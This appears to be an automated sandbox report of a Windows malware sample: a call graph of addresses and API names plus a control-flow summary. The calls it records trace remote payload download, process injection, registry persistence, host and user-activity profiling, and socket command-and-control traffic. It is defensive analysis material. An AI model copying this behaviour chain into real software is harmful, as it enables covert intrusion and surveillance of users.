GetStartupInfoW 32144->32145 32145->32140 32147 7ff6f6081bec 32146->32147 32157 7ff6f6081300 32147->32157 32149 7ff6f6081c23 32180 7ff6f6081a10 32149->32180 32153 7ff6f60842b5 32152->32153 32153->32140 32155 7ff6f608408b 32154->32155 32156 7ff6f6084017 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter 32154->32156 32155->32140 32156->32155 32189 7ff6f6084890 32157->32189 32160 7ff6f6081366 InternetOpenUrlW 32162 7ff6f6081397 InternetCloseHandle 32160->32162 32167 7ff6f60813a7 std::_Facet_Register 32160->32167 32177 7ff6f60813a0 32162->32177 32164 7ff6f6081676 32164->32149 32166 7ff6f608151d 32169 7ff6f60815cc InternetReadFile 32166->32169 32170 7ff6f60815b6 InternetCloseHandle InternetCloseHandle 32166->32170 32168 7ff6f6081692 Concurrency::cancel_current_task 32167->32168 32191 7ff6f6082cf0 32167->32191 32171 7ff6f6081618 32169->32171 32172 7ff6f60815e4 32169->32172 32173 7ff6f608165a 32170->32173 32197 7ff6f6082c30 32171->32197 32172->32171 32178 7ff6f60815fd InternetReadFile 32172->32178 32208 7ff6f60816a0 IsProcessorFeaturePresent RtlCaptureContext RtlLookupFunctionEntry 32173->32208 32176 7ff6f6081622 32179 7ff6f6081646 InternetCloseHandle InternetCloseHandle 32176->32179 32201 7ff6f60838f0 32177->32201 32178->32171 32178->32172 32179->32173 32181 7ff6f6081a64 32180->32181 32219 7ff6f6081760 32181->32219 32184 7ff6f6085020 32185 7ff6f6081af0 QueueUserAPC 32184->32185 32188 7ff6f6081b01 32185->32188 32186 7ff6f60838f0 3 API calls 32187 7ff6f6081ba1 32186->32187 32187->32140 32188->32186 32190 7ff6f6081324 InternetOpenW 32189->32190 32190->32160 32190->32177 32193 7ff6f6082d33 32191->32193 32192 7ff6f60838f0 3 API calls 32194 7ff6f6082ed7 32192->32194 32196 7ff6f6082e61 32193->32196 32209 7ff6f6083140 IsProcessorFeaturePresent RtlCaptureContext RtlLookupFunctionEntry Concurrency::cancel_current_task std::_Facet_Register 32193->32209 32194->32166 32196->32192 32198 7ff6f6082c47 32197->32198 32199 7ff6f6082c81 32197->32199 32210 7ff6f6082b40 32198->32210 32199->32176 32202 7ff6f60838f9 32201->32202 32203 7ff6f6083904 32202->32203 32204 7ff6f6083e64 IsProcessorFeaturePresent 32202->32204 32203->32164 32205 7ff6f6083e7c 32204->32205 32218 7ff6f6083f38 RtlCaptureContext RtlLookupFunctionEntry capture_previous_context 32205->32218 32207 7ff6f6083e8f 32207->32164 32209->32196 32211 7ff6f6082c13 32210->32211 32212 7ff6f6082b63 32210->32212 32213 7ff6f60838f0 3 API calls 32211->32213 32212->32211 32217 7ff6f6082b6d 32212->32217 32214 7ff6f6082c22 32213->32214 32214->32199 32215 7ff6f60838f0 3 API calls 32216 7ff6f6082bce 32215->32216 32216->32199 32217->32215 32218->32207 32220 7ff6f60817a7 32219->32220 32229 7ff6f6083510 32220->32229 32222 7ff6f608181c 32235 7ff6f6081950 32222->32235 32224 7ff6f60817be 32224->32222 32228 7ff6f6082c30 3 API calls 32224->32228 32225 7ff6f608191f 32226 7ff6f60838f0 IsProcessorFeaturePresent RtlCaptureContext RtlLookupFunctionEntry 32225->32226 32227 7ff6f6081932 GetModuleHandleA GetProcAddress VirtualAlloc GetCurrentProcess WriteProcessMemory 32226->32227 32227->32184 32228->32222 32233 7ff6f6083553 32229->32233 32230 7ff6f6083681 32231 7ff6f60838f0 3 API calls 32230->32231 32232 7ff6f60836f7 32231->32232 32232->32224 32233->32230 32239 7ff6f6083140 IsProcessorFeaturePresent RtlCaptureContext RtlLookupFunctionEntry Concurrency::cancel_current_task std::_Facet_Register 32233->32239 32236 7ff6f60819a6 32235->32236 32237 7ff6f6082c30 3 API calls 32236->32237 32238 7ff6f60819e3 32236->32238 32237->32238 32239->32230 32240 1cfb96037d0 32241 1cfb9603843 32240->32241 32243 1cfb96037e8 32240->32243 32242 1cfb96037f6 Sleep 32242->32243 32243->32241 32243->32242 32244 1cfb960381f timeGetTime 32243->32244 32244->32243 32467 1cfb9300000 32470 1cfb93118bb 32467->32470 32471 1cfb93119bb 32470->32471 32472 1cfb93118ed 32470->32472 32482 1cfb9312c89 32471->32482 32505 1cfb9314731 32472->32505 32476 1cfb9314731 LoadLibraryA 32477 1cfb9311935 32476->32477 32478 1cfb9314731 LoadLibraryA 32477->32478 32479 1cfb931194b 32478->32479 32480 1cfb9314731 LoadLibraryA 32479->32480 32481 1cfb9300005 32480->32481 32483 1cfb9314731 LoadLibraryA 32482->32483 32484 1cfb9312cb2 32483->32484 32485 1cfb9314731 LoadLibraryA 32484->32485 32486 1cfb9312cc5 32485->32486 32487 1cfb9314731 LoadLibraryA 32486->32487 32488 1cfb9312cdb 32487->32488 32489 1cfb9312ced VirtualAlloc 32488->32489 32504 1cfb9312d06 32488->32504 32490 1cfb9312d32 32489->32490 32489->32504 32491 1cfb9314731 LoadLibraryA 32490->32491 32490->32504 32494 1cfb9312da6 32491->32494 32492 1cfb9314731 LoadLibraryA 32493 1cfb9312dfd 32492->32493 32493->32492 32496 1cfb9312e3d 32493->32496 32493->32504 32494->32493 32494->32504 32557 1cfb93144a1 32494->32557 32497 1cfb9312eb4 32496->32497 32496->32504 32509 1cfb9311bf1 32496->32509 32499 1cfb9312ecf VirtualAlloc 32497->32499 32503 1cfb9312efe 32497->32503 32497->32504 32499->32503 32499->32504 32503->32504 32532 1cfb9313495 32503->32532 32504->32481 32506 1cfb9314768 32505->32506 32507 1cfb93118fd 32506->32507 32567 1cfb931223d LoadLibraryA 32506->32567 32507->32476 32507->32481 32510 1cfb93144a1 LoadLibraryA 32509->32510 32511 1cfb9311c10 32510->32511 32514 1cfb9311c18 32511->32514 32561 1cfb9314589 32511->32561 32514->32504 32523 1cfb9311d1d 32514->32523 32515 1cfb9311c5a VirtualProtect 32515->32514 32516 1cfb9311c78 32515->32516 32517 1cfb9311c86 VirtualProtect 32516->32517 32518 1cfb9314589 LoadLibraryA 32517->32518 32519 1cfb9311cae 32518->32519 32519->32514 32520 1cfb9311cc9 VirtualProtect 32519->32520 32520->32514 32521 1cfb9311ce2 32520->32521 32522 1cfb9311cf0 VirtualProtect 32521->32522 32522->32514 32524 1cfb93144a1 LoadLibraryA 32523->32524 32525 1cfb9311d3b 32524->32525 32526 1cfb9314589 LoadLibraryA 32525->32526 32527 1cfb9311d50 32526->32527 32528 1cfb9311d58 VirtualProtect 32527->32528 32529 1cfb9311d9a 32527->32529 32528->32529 32530 1cfb9311d72 32528->32530 32529->32497 32531 1cfb9311d84 VirtualProtect 32530->32531 32531->32529 32533 1cfb93134e9 32532->32533 32534 1cfb9313541 NtCreateSection 32533->32534 32536 1cfb9313570 32533->32536 32556 1cfb9313d1d 32533->32556 32534->32536 32534->32556 32535 1cfb9313616 NtMapViewOfSection 32538 1cfb931366a 32535->32538 32536->32535 32536->32556 32537 1cfb93139e5 VirtualAlloc 32543 1cfb9313a9c 32537->32543 32539 1cfb93144a1 LoadLibraryA 32538->32539 32545 1cfb9314589 LoadLibraryA 32538->32545 32547 1cfb9313946 32538->32547 32538->32556 32539->32538 32541 1cfb93144a1 LoadLibraryA 32541->32547 32542 1cfb9313b98 VirtualProtect 32544 1cfb9313cab VirtualProtect 32542->32544 32553 1cfb9313bc0 32542->32553 32543->32542 32546 1cfb9313b14 NtUnmapViewOfSection 32543->32546 32550 1cfb9313ce7 32544->32550 32545->32538 32549 1cfb9313b2c NtMapViewOfSection 32546->32549 32546->32556 32547->32537 32547->32541 32548 1cfb9314589 LoadLibraryA 32547->32548 32548->32547 32549->32542 32549->32556 32550->32556 32566 1cfb9314245 LoadLibraryA 32550->32566 32551 1cfb9313c9e 32551->32544 32553->32551 32555 1cfb9313c71 VirtualProtect 32553->32555 32555->32553 32556->32504 32560 1cfb93144bf 32557->32560 32558 1cfb931456a LoadLibraryA 32559 1cfb9314572 32558->32559 32559->32494 32560->32558 32560->32559 32562 1cfb93145bf 32561->32562 32564 1cfb9311c37 32561->32564 32562->32564 32565 1cfb93123f5 LoadLibraryA 32562->32565 32564->32514 32564->32515 32565->32564 32566->32556 32567->32506 32568 1cfb96072f0 CreateMutexW 32569 1cfb9607320 free 32568->32569 32571 1cfb9607359 _recalloc 32569->32571 32573 1cfb9607327 free 32569->32573 32570 1cfb9607330 Sleep CreateMutexW 32570->32573 32572 1cfb96073d1 malloc 32571->32572 32575 1cfb9607380 lstrlenW 32571->32575 32582 1cfb96073a7 lstrcmpW 32571->32582 32583 1cfb96073bd Sleep 32571->32583 32574 1cfb96073d9 GetConsoleWindow 32572->32574 32573->32570 32573->32571 32598 1cfb9610dd0 19 API calls 2 library calls 32574->32598 32587 1cfb9608310 32575->32587 32578 1cfb96073f8 32579 1cfb9607416 32578->32579 32580 1cfb96073fc 32578->32580 32610 1cfb96111e0 35 API calls 4 library calls 32579->32610 32599 1cfb96118a0 32580->32599 32582->32572 32582->32583 32583->32571 32583->32572 32586 1cfb960740e 32611 1cfb9615b40 32587->32611 32589 1cfb9608357 RegOpenKeyExW 32590 1cfb9608384 32589->32590 32597 1cfb960837f 32589->32597 32591 1cfb96083f5 RegCloseKey RegCloseKey 32590->32591 32592 1cfb9608391 RegQueryValueExW 32590->32592 32593 1cfb96118a0 _fltout2 8 API calls 32591->32593 32592->32591 32594 1cfb96083c7 lstrcmpW 32592->32594 32595 1cfb960841f 32593->32595 32596 1cfb96083e2 lstrcpyW 32594->32596 32594->32597 32595->32571 32596->32591 32597->32591 32598->32578 32600 1cfb96118a9 32599->32600 32601 1cfb9613f00 RtlCaptureContext RtlLookupFunctionEntry 32600->32601 32602 1cfb96118b4 32600->32602 32603 1cfb9613f44 RtlVirtualUnwind 32601->32603 32604 1cfb9613f85 32601->32604 32602->32586 32605 1cfb9613fa7 IsDebuggerPresent 32603->32605 32604->32605 32613 1cfb961af14 32605->32613 32607 1cfb9614006 SetUnhandledExceptionFilter UnhandledExceptionFilter 32608 1cfb9614024 _fltout2 32607->32608 32609 1cfb961402e GetCurrentProcess TerminateProcess 32607->32609 32608->32609 32609->32586 32612 1cfb9615b49 32611->32612 32612->32589 32612->32612 32613->32607 32245 1cfb9393860 32246 1cfb9393889 32245->32246 32247 1cfb9393925 __initmbctable 32246->32247 32248 1cfb93938f8 VirtualAlloc 32246->32248 32255 1cfb9391080 32247->32255 32248->32247 32250 1cfb9393a7f 32261 1cfb9393b10 32250->32261 32254 1cfb9393ae3 32256 1cfb93910a9 32255->32256 32257 1cfb93910e2 VirtualAlloc 32256->32257 32258 1cfb9391139 __initmbctable 32256->32258 32259 1cfb939110a __initmbctable 32257->32259 32258->32250 32259->32258 32260 1cfb939112b VirtualFree 32259->32260 32260->32258 32263 1cfb9393b48 32261->32263 32262 1cfb9393ac4 32265 1cfb93911f0 32262->32265 32263->32262 32264 1cfb9393bb0 send 32263->32264 32264->32262 32264->32263 32266 1cfb9391200 32265->32266 32267 1cfb9391249 VirtualAlloc 32266->32267 32268 1cfb939120a 32266->32268 32269 1cfb9391273 __initmbctable 32267->32269 32268->32254 32270 1cfb9391289 VirtualFree 32269->32270 32270->32254 32271 1cfb9396860 32272 1cfb9396882 32271->32272 32282 1cfb93969fc _vsprintf_s_l __initmbctable 32271->32282 32273 1cfb9396894 RegOpenKeyExW 32272->32273 32274 1cfb9396b26 __initmbctable 32272->32274 32280 1cfb93968d5 _vsprintf_s_l __initmbctable 32273->32280 32275 1cfb9396b3b VirtualAlloc 32274->32275 32278 1cfb9396b71 __initmbctable 32275->32278 32277 1cfb9396c4c SleepEx 32277->32282 32279 1cfb9396bc0 RegCreateKeyW 32278->32279 32278->32280 32279->32280 32281 1cfb9396bdf RegDeleteValueW RegSetValueExW 32279->32281 32280->32282 32283 1cfb93994dc 32280->32283 32281->32280 32284 1cfb9399507 32283->32284 32285 1cfb939951c 32283->32285 32312 1cfb9399384 RtlAllocateHeap _errno 32284->32312 32298 1cfb939c0a0 32285->32298 32287 1cfb939950c _invalid_parameter_noinfo 32287->32277 32292 1cfb93995a8 32292->32287 32314 1cfb93993c4 RtlAllocateHeap _errno free 32292->32314 32296 1cfb939954c CreateThread 32296->32287 32297 1cfb9399598 32296->32297 32313 1cfb9399030 RtlAllocateHeap _errno free 32297->32313 32300 1cfb939c0c5 32298->32300 32301 1cfb9399530 32300->32301 32315 1cfb939fcb4 32300->32315 32301->32297 32302 1cfb939ba34 32301->32302 32320 1cfb939b9b0 32302->32320 32305 1cfb939953d 32307 1cfb939b8f8 32305->32307 32331 1cfb939d9d8 32307->32331 32309 1cfb939b951 _locterm$fin$0 32310 1cfb939d9d8 _lock RtlAllocateHeap 32309->32310 32311 1cfb939b970 _errno _locterm$fin$0 32310->32311 32311->32296 32312->32287 32313->32292 32314->32287 32316 1cfb939fcc9 32315->32316 32318 1cfb939fcdc _callnewh 32315->32318 32316->32318 32319 1cfb9399384 RtlAllocateHeap _errno 32316->32319 32318->32300 32319->32318 32321 1cfb939b9c0 32320->32321 32322 1cfb939c0a0 __onexitinit RtlAllocateHeap 32321->32322 32328 1cfb939ba08 32321->32328 32323 1cfb939b9e3 32322->32323 32324 1cfb939ba17 32323->32324 32325 1cfb939ba01 32323->32325 32323->32328 32330 1cfb9399030 RtlAllocateHeap _errno free 32324->32330 32327 1cfb939b8f8 _errno RtlAllocateHeap 32325->32327 32327->32328 32328->32305 32329 1cfb939a2b8 RtlAllocateHeap _lock _FF_MSGBANNER 32328->32329 32330->32328 32332 1cfb939da07 32331->32332 32333 1cfb939d9f6 32331->32333 32337 1cfb939d8f0 RtlAllocateHeap 6 library calls 32333->32337 32335 1cfb939d9fb 32335->32332 32338 1cfb939a2b8 RtlAllocateHeap _lock _FF_MSGBANNER 32335->32338 32337->32335 32339 1cfb93980e0 32340 1cfb93998b0 32339->32340 32341 1cfb939810c SleepEx 32340->32341 32351 1cfb9399128 32341->32351 32343 1cfb939812a 32344 1cfb9399128 RtlAllocateHeap 32343->32344 32345 1cfb9398149 32344->32345 32350 1cfb939815e 32345->32350 32360 1cfb9396f70 32345->32360 32347 1cfb93992d0 RtlAllocateHeap _FF_MSGBANNER 32347->32350 32348 1cfb9398285 SleepEx 32348->32350 32349 1cfb939832d SleepEx 32349->32350 32350->32347 32350->32348 32350->32349 32354 1cfb9399133 _callnewh 32351->32354 32353 1cfb939914c 32353->32343 32354->32353 32357 1cfb9399152 32354->32357 32364 1cfb9399070 32354->32364 32355 1cfb93991a3 32369 1cfb9399004 RtlAllocateHeap std::exception::operator= 32355->32369 32357->32355 32368 1cfb9399728 RtlAllocateHeap _cinit 32357->32368 32358 1cfb93991b4 __CxxFrameHandler 32361 1cfb9396fb6 32360->32361 32370 1cfb9398650 HeapCreate 32361->32370 32363 1cfb9397067 32363->32350 32365 1cfb9399088 _callnewh malloc _FF_MSGBANNER 32364->32365 32367 1cfb93990e9 _callnewh _errno 32364->32367 32366 1cfb93990c0 RtlAllocateHeap 32365->32366 32365->32367 32366->32365 32366->32367 32367->32354 32368->32355 32369->32358 32371 1cfb939868f 32370->32371 32372 1cfb93986c9 32371->32372 32374 1cfb9399030 RtlAllocateHeap _errno free 32371->32374 32372->32363 32374->32372 32375 1cfb93937e0 32376 1cfb9393853 32375->32376 32378 1cfb93937f8 32375->32378 32377 1cfb9393806 SleepEx 32377->32378 32378->32376 32378->32377 32614 1cfb960d877 32615 1cfb960d880 32614->32615 32616 1cfb960d889 32614->32616 32620 1cfb960db70 32615->32620 32618 1cfb960db70 114 API calls 32616->32618 32619 1cfb960d887 32618->32619 32630 1cfb9611ef8 32620->32630 32622 1cfb960db91 _recalloc 32623 1cfb960dba4 GetLastInputInfo 32622->32623 32640 1cfb9626150 32623->32640 32625 1cfb960dbc6 wsprintfW GetForegroundWindow 32626 1cfb960dc05 GetWindowTextW 32625->32626 32627 1cfb960dc18 32625->32627 32626->32627 32628 1cfb960dd20 110 API calls 32627->32628 32629 1cfb960dc55 memcpy_s 32628->32629 32629->32619 32632 1cfb9611f03 32630->32632 32633 1cfb9611f1c 32632->32633 32637 1cfb9611f22 32632->32637 32642 1cfb9611e40 32632->32642 32659 1cfb961499c DecodePointer 32632->32659 32633->32622 32635 1cfb9611f73 32661 1cfb9611dd4 31 API calls std::exception::operator= 32635->32661 32637->32635 32660 1cfb961251c 37 API calls _cinit 32637->32660 32638 1cfb9611f84 __SehTransFilter 32641 1cfb9626157 32640->32641 32643 1cfb9611ed4 32642->32643 32656 1cfb9611e58 32642->32656 32668 1cfb961499c DecodePointer 32643->32668 32645 1cfb9611e90 HeapAlloc 32649 1cfb9611ec9 32645->32649 32645->32656 32646 1cfb9611ed9 32669 1cfb9612178 31 API calls __doserrno 32646->32669 32649->32632 32650 1cfb9611eb9 32666 1cfb9612178 31 API calls __doserrno 32650->32666 32654 1cfb9611ebe 32667 1cfb9612178 31 API calls __doserrno 32654->32667 32655 1cfb9611e70 32655->32645 32662 1cfb9614950 31 API calls 2 library calls 32655->32662 32663 1cfb96146f0 31 API calls 4 library calls 32655->32663 32664 1cfb961435c ExitProcess malloc 32655->32664 32656->32645 32656->32650 32656->32654 32656->32655 32665 1cfb961499c DecodePointer 32656->32665 32659->32632 32660->32635 32661->32638 32662->32655 32663->32655 32665->32656 32666->32654 32667->32649 32668->32646 32669->32649 32379 1cfb95b0000 32380 1cfb95b0448 32379->32380 32382 1cfb95b05b1 32380->32382 32383 1cfb95b00dc 32380->32383 32384 1cfb95b0116 32383->32384 32388 1cfb95b032a 32383->32388 32385 1cfb95b0147 VirtualAlloc 32384->32385 32384->32388 32387 1cfb95b0168 32385->32387 32385->32388 32386 1cfb95b02b7 LoadLibraryA 32386->32387 32386->32388 32387->32386 32387->32388 32388->32382 32670 1cfb9396682 32672 1cfb93966a8 __initmbctable 32670->32672 32671 1cfb93966cb RegOpenKeyExW RegDeleteValueW RegSetValueExW 32675 1cfb9396737 32671->32675 32672->32671 32673 1cfb93967a4 32675->32673 32676 1cfb9396c80 RtlAllocateHeap _vsprintf_s_l _fltout2 32675->32676 32676->32675 32677 7ff6f6081fb0 32678 7ff6f6081fe3 32677->32678 32679 7ff6f6082b40 3 API calls 32678->32679 32682 7ff6f6082006 32678->32682 32679->32682 32680 7ff6f60838f0 3 API calls 32681 7ff6f60820ab 32680->32681 32682->32680 32389 1cfb96107a0 32432 1cfb9612fc4 32389->32432 32391 1cfb96107ec Sleep 32392 1cfb9610806 32391->32392 32393 1cfb9610835 32391->32393 32396 1cfb9611ef8 37 API calls 32392->32396 32394 1cfb9610843 GetLocalTime wsprintfW SetUnhandledExceptionFilter 32393->32394 32395 1cfb961083e 32393->32395 32398 1cfb96122d0 32 API calls 32394->32398 32397 1cfb9608be0 15 API calls 32395->32397 32399 1cfb961080f 32396->32399 32397->32394 32400 1cfb96108be CloseHandle 32398->32400 32401 1cfb96122d0 32 API calls 32399->32401 32402 1cfb9611ef8 37 API calls 32400->32402 32403 1cfb961082c CloseHandle 32401->32403 32404 1cfb96108d1 32402->32404 32403->32393 32405 1cfb96108de 32404->32405 32406 1cfb9603220 10 API calls 32404->32406 32407 1cfb9611ef8 37 API calls 32405->32407 32406->32405 32408 1cfb96108f0 32407->32408 32409 1cfb960b300 40 API calls 32408->32409 32414 1cfb9610902 32408->32414 32409->32414 32410 1cfb9610a29 EnumWindows 32411 1cfb9610a47 32410->32411 32410->32414 32412 1cfb9610a50 Sleep EnumWindows 32411->32412 32412->32412 32412->32414 32413 1cfb96120c4 31 API calls _FF_MSGBANNER 32413->32414 32414->32410 32414->32413 32415 1cfb9610aa7 Sleep 32414->32415 32416 1cfb9610af5 CreateEventA 32414->32416 32415->32414 32417 1cfb96120c4 _FF_MSGBANNER 31 API calls 32416->32417 32418 1cfb9610b36 RegOpenKeyExW 32417->32418 32419 1cfb9610b79 32418->32419 32420 1cfb960ee20 49 API calls 32419->32420 32421 1cfb9610b9c Sleep RegOpenKeyExW 32419->32421 32423 1cfb96067b0 164 API calls 32419->32423 32428 1cfb9610c2e 32419->32428 32420->32419 32421->32419 32422 1cfb9610bdf RegQueryValueExW 32421->32422 32422->32419 32423->32419 32424 1cfb96122d0 32 API calls 32424->32428 32425 1cfb9610c79 Sleep 32425->32428 32426 1cfb9610d12 CloseHandle 32426->32414 32427 1cfb9610ce2 WaitForSingleObject CloseHandle 32427->32428 32428->32424 32428->32425 32428->32426 32428->32427 32429 1cfb9610d03 Sleep 32428->32429 32430 1cfb9610ca9 WaitForSingleObject CloseHandle 32428->32430 32431 1cfb9610cbe Sleep 32428->32431 32429->32426 32430->32431 32431->32426 32433 1cfb96139f0 32432->32433 32683 1cfb9603300 32684 1cfb960330f setsockopt CancelIo closesocket SetEvent 32683->32684 32685 1cfb960337a 32683->32685 32684->32685 32686 1cfb9603680 32693 1cfb96036b0 memcpy_s 32686->32693 32687 1cfb9603768 32689 1cfb96118a0 _fltout2 8 API calls 32687->32689 32688 1cfb9603700 select 32688->32687 32688->32693 32690 1cfb96037a0 32689->32690 32691 1cfb9603728 recv 32692 1cfb96037a9 32691->32692 32691->32693 32696 1cfb9603bd0 40 API calls memcpy_s 32692->32696 32693->32687 32693->32688 32693->32691 32695 1cfb9612178 31 API calls _errno 32693->32695 32695->32693 32696->32693 32697 1cfb9603380 ResetEvent timeGetTime socket 32698 1cfb960340f lstrlenW WideCharToMultiByte 32697->32698 32711 1cfb9603408 32697->32711 32699 1cfb9611878 32698->32699 32701 1cfb960345a lstrlenW WideCharToMultiByte gethostbyname 32699->32701 32700 1cfb96118a0 _fltout2 8 API calls 32702 1cfb960366b 32700->32702 32703 1cfb96034a1 32701->32703 32704 1cfb96034ae htons connect 32703->32704 32703->32711 32705 1cfb96034f4 setsockopt setsockopt setsockopt setsockopt 32704->32705 32704->32711 32706 1cfb96035f7 32705->32706 32707 1cfb96035a8 WSAIoctl 32705->32707 32712 1cfb96122d0 32706->32712 32707->32706 32710 1cfb96122d0 32 API calls 32710->32711 32711->32700 32713 1cfb9612310 32712->32713 32714 1cfb96122fb 32712->32714 32718 1cfb9616f6c __onexitinit 31 API calls 32713->32718 32734 1cfb9612178 31 API calls __doserrno 32714->32734 32716 1cfb9612300 32735 1cfb9614bc8 DecodePointer _invalid_parameter_noinfo 32716->32735 32720 1cfb9612324 32718->32720 32719 1cfb9603621 32719->32710 32728 1cfb961238c free 32720->32728 32729 1cfb96168ec 32720->32729 32721 1cfb9611e00 free 31 API calls 32723 1cfb961239c 32721->32723 32723->32719 32736 1cfb96121b8 31 API calls 2 library calls 32723->32736 32725 1cfb96167b0 __doserrno 31 API calls 32727 1cfb9612340 CreateThread 32725->32727 32727->32719 32727->32728 32728->32721 32737 1cfb9616868 32729->32737 32731 1cfb96168f7 32732 1cfb9612331 32731->32732 32747 1cfb961469c 31 API calls 2 library calls 32731->32747 32732->32725 32734->32716 32735->32719 32736->32719 32738 1cfb9616878 __doserrno free 32737->32738 32739 1cfb96168d4 __doserrno 32738->32739 32740 1cfb9616f6c __onexitinit 30 API calls 32738->32740 32739->32731 32741 1cfb961689b __doserrno 32740->32741 32741->32739 32742 1cfb96168cf 32741->32742 32743 1cfb96168b9 32741->32743 32744 1cfb9611e00 free 30 API calls 32742->32744 32745 1cfb96167b0 __doserrno 30 API calls 32743->32745 32744->32739 32746 1cfb96168c0 GetCurrentThreadId 32745->32746 32746->32739 32748 1cfb93998fc 32750 1cfb9399914 32748->32750 32780 1cfb9399ec8 HeapCreate 32750->32780 32752 1cfb939996b 32795 1cfb939a30c RtlAllocateHeap _fltout2 _FF_MSGBANNER _set_error_mode 32752->32795 32756 1cfb9399984 32758 1cfb93999a0 malloc _RTC_Initialize 32756->32758 32759 1cfb9399996 32756->32759 32796 1cfb939a56c RtlAllocateHeap _FF_MSGBANNER _set_error_mode 32756->32796 32757 1cfb9399975 malloc 32782 1cfb939bbcc RtlAllocateHeap _errno __onexitinit 32757->32782 32783 1cfb939d3cc RtlAllocateHeap __onexitinit 32758->32783 32797 1cfb939a30c RtlAllocateHeap _fltout2 _FF_MSGBANNER _set_error_mode 32759->32797 32763 1cfb93999b5 32764 1cfb93999c3 32763->32764 32798 1cfb939a2b8 RtlAllocateHeap _lock _FF_MSGBANNER 32763->32798 32784 1cfb939d344 RtlAllocateHeap _getbuf __initmbctable 32764->32784 32767 1cfb93999ef 32785 1cfb939cf84 RtlAllocateHeap _fltout2 __onexitinit free _FF_MSGBANNER 32767->32785 32768 1cfb93999d5 32768->32767 32799 1cfb939a2b8 RtlAllocateHeap _lock _FF_MSGBANNER 32768->32799 32771 1cfb93999f4 32772 1cfb9399a02 32771->32772 32800 1cfb939a2b8 RtlAllocateHeap _lock _FF_MSGBANNER 32771->32800 32786 1cfb939a040 RtlAllocateHeap _cinit _initterm_e 32772->32786 32775 1cfb9399a0c 32776 1cfb9399a17 32775->32776 32801 1cfb939a2b8 RtlAllocateHeap _lock _FF_MSGBANNER 32775->32801 32787 1cfb9398580 32776->32787 32779 1cfb9399a37 32781 1cfb9399959 32780->32781 32781->32752 32781->32757 32794 1cfb939a56c RtlAllocateHeap _FF_MSGBANNER _set_error_mode 32781->32794 32782->32756 32783->32763 32784->32768 32785->32771 32786->32775 32788 1cfb9398591 PostThreadMessageA 32787->32788 32790 1cfb93985be 32788->32790 32802 1cfb93973d0 32790->32802 32792 1cfb93985c3 CreateThread 32793 1cfb93985f7 32792->32793 32793->32779 32794->32752 32795->32757 32796->32759 32797->32758 32805 1cfb93973e4 _vsprintf_s_l _wcsrev 32802->32805 32806 1cfb9397dbb _vsprintf_s_l 32802->32806 32803 1cfb9397d4d RegOpenKeyExW 32804 1cfb9397d8b RegQueryValueExW 32803->32804 32803->32806 32804->32806 32805->32803 32806->32792 32434 1cfb9393310 32435 1cfb939337a 32434->32435 32436 1cfb939331f setsockopt 32434->32436 32437 1cfb9393360 closesocket 32436->32437 32437->32435 32438 1cfb9393c10 32439 1cfb9393c26 SleepEx 32438->32439 32440 1cfb9393c46 32439->32440 32441 1cfb9393390 32442 1cfb93933c7 socket 32441->32442 32444 1cfb9393418 _fltout2 32442->32444 32445 1cfb939341f 32442->32445 32446 1cfb9393499 gethostbyname 32445->32446 32447 1cfb93934b1 32446->32447 32447->32444 32448 1cfb93934ce connect 32447->32448 32448->32444 32449 1cfb9393504 setsockopt setsockopt setsockopt setsockopt 32448->32449 32450 1cfb93935b8 WSAIoctl 32449->32450 32451 1cfb9393607 32449->32451 32450->32451 32452 1cfb93994dc 2 API calls 32451->32452 32453 1cfb9393631 32452->32453 32454 1cfb93994dc 2 API calls 32453->32454 32454->32444 32455 1cfb9393690 32459 1cfb93936c0 __initmbctable 32455->32459 32456 1cfb9393710 select 32457 1cfb9393778 _fltout2 32456->32457 32456->32459 32458 1cfb9393738 recv 32458->32459 32459->32456 32459->32457 32459->32458 32461 1cfb9399384 RtlAllocateHeap _errno 32459->32461 32462 1cfb9393c80 VirtualAlloc VirtualFree VirtualAlloc VirtualFree __initmbctable 32459->32462 32461->32459 32462->32459

                          Executed Functions

                          Function 000001CFB96067B0 Relevance: 73.8, APIs: 29, Strings: 13, Instructions: 324stringnetworklibraryCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 0 1cfb96067b0-1cfb960687d call 1cfb9611ef8 call 1cfb9615b40 * 2 gethostname gethostbyname 7 1cfb9606921-1cfb9606a6b MultiByteToWideChar * 2 GetLastInputInfo call 1cfb9626150 wsprintfW MultiByteToWideChar * 2 call 1cfb9608a70 GetSystemInfo wsprintfW call 1cfb9608180 call 1cfb9608440 GetForegroundWindow 0->7 8 1cfb9606883-1cfb96068cd inet_ntoa call 1cfb9612e20 * 2 0->8 25 1cfb9606a83-1cfb9606ac0 lstrlenW call 1cfb9608310 7->25 26 1cfb9606a6d-1cfb9606a7d GetWindowTextW 7->26 8->7 18 1cfb96068cf 8->18 20 1cfb96068d2-1cfb960691f inet_ntoa call 1cfb9612e20 * 2 18->20 20->7 31 1cfb9606ac2-1cfb9606ad5 call 1cfb96120c4 25->31 32 1cfb9606ada-1cfb9606b18 call 1cfb96120c4 lstrlenW call 1cfb9608310 25->32 26->25 31->32 38 1cfb9606b32-1cfb9606b72 call 1cfb9626148 call 1cfb96261e8 32->38 39 1cfb9606b1a-1cfb9606b2d call 1cfb96120c4 32->39 45 1cfb9606b74-1cfb9606b76 GetNativeSystemInfo 38->45 46 1cfb9606b78 GetSystemInfo 38->46 39->38 47 1cfb9606b7e-1cfb9606b8b 45->47 46->47 48 1cfb9606b9b 47->48 49 1cfb9606b8d-1cfb9606b95 47->49 51 1cfb9606ba0-1cfb9606bfe wsprintfW call 1cfb9607f70 call 1cfb9626280 call 1cfb9609a50 call 1cfb9607a90 48->51 49->48 50 1cfb9606b97-1cfb9606b99 49->50 50->51 60 1cfb9606c00 51->60 61 1cfb9606c07-1cfb9606d12 call 1cfb96120c4 call 1cfb9607860 call 1cfb9607510 call 1cfb9612534 call 1cfb9626150 call 1cfb9612e9c call 1cfb9612dd8 wsprintfW GetLocaleInfoW GetSystemDirectoryW GetCurrentHwProfileW 51->61 60->61 76 1cfb9606d1f 61->76 77 1cfb9606d14-1cfb9606d1d 61->77 78 1cfb9606d28-1cfb9606d95 call 1cfb9606da0 call 1cfb9611880 call 1cfb96118a0 76->78 77->78
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112680827.000001CFB9600000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001CFB9600000, based on PE: true
                          • Associated: 00000000.00000002.4112680827.000001CFB963A000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000000.00000002.4112680827.000001CFB963C000.00000040.00001000.00020000.00000000.sdmpDownload File
